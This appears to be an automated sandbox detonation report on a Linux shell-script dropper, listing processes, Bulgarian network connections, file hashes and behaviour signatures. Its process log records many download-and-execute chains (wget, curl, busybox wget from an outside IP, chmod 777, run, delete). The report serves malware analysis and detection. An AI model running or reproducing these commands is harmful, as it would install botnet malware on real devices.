/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/rm

[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/chmod

[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z

[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/rm

[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/chmod

[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI

[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/rm

[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/753-1-0xb6703000-0xb6714044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:20

Reported

2024-10-25 01:23

Platform

debian9-mipsbe-20240729-en

Max time kernel

65s

Max time network

66s

Command Line

[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ N/A
N/A /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z N/A
N/A /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI N/A
N/A /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 N/A
N/A /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf N/A
N/A /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk N/A
N/A /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh N/A
N/A /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC N/A
N/A /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR N/A
N/A /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx N/A
N/A /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu N/A
N/A /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY N/A
N/A /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 N/A
N/A /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR N/A
N/A /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu N/A
N/A /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY N/A
N/A /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 N/A
N/A /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR N/A
N/A /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ N/A
N/A /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z N/A
N/A /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI N/A
N/A /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 N/A
N/A /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf N/A
N/A /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk N/A
N/A /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh N/A
N/A /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC N/A
N/A /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR N/A
N/A /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /usr/bin/curl N/A
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /usr/bin/curl N/A
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /usr/bin/curl N/A
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /usr/bin/curl N/A
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /usr/bin/curl N/A
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /usr/bin/curl N/A
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /usr/bin/curl N/A
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /usr/bin/curl N/A
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /usr/bin/curl N/A
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /usr/bin/curl N/A
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /usr/bin/curl N/A
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /usr/bin/curl N/A
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /usr/bin/curl N/A
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /usr/bin/curl N/A
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /usr/bin/curl N/A
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /usr/bin/curl N/A
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /usr/bin/curl N/A
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /usr/bin/curl N/A
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /usr/bin/curl N/A
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /usr/bin/curl N/A
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /usr/bin/curl N/A
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /usr/bin/curl N/A
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /usr/bin/curl N/A
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /usr/bin/curl N/A
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /usr/bin/curl N/A
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /usr/bin/curl N/A
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /usr/bin/curl N/A
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /usr/bin/curl N/A

Processes

/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh

[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/chmod

[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ

[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/bin/rm

[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/chmod

[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z

[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/bin/rm

[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/chmod

[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI

[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/bin/rm

[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/chmod

[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0

[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/bin/rm

[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]

/usr/bin/wget

[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/chmod

[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf

[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/bin/rm

[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]

/usr/bin/wget

[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/chmod

[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk

[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/bin/rm

[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]

/usr/bin/wget

[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/chmod

[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh

[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/bin/rm

[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]

/usr/bin/wget

[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/chmod

[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC

[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/bin/rm

[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]

/usr/bin/wget

[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/chmod

[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR

[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/bin/rm

[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]

/usr/bin/wget

[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/chmod

[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx

[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/bin/rm

[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]

/usr/bin/wget

[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/chmod

[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu

[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/rm

[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/wget

[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/chmod

[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY

[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/rm

[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/wget

[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/chmod

[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959

[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/rm

[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/wget

[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/chmod

[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR

[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/rm

[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/wget

[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/chmod

[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu

[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/bin/rm

[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]

/usr/bin/wget

[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/chmod

[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY

[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/bin/rm

[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]

/usr/bin/wget

[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/chmod

[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959

[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/bin/rm

[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]

/usr/bin/wget

[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/chmod

[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR

[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/bin/rm

[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]

/usr/bin/wget

[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]

/usr/bin/curl

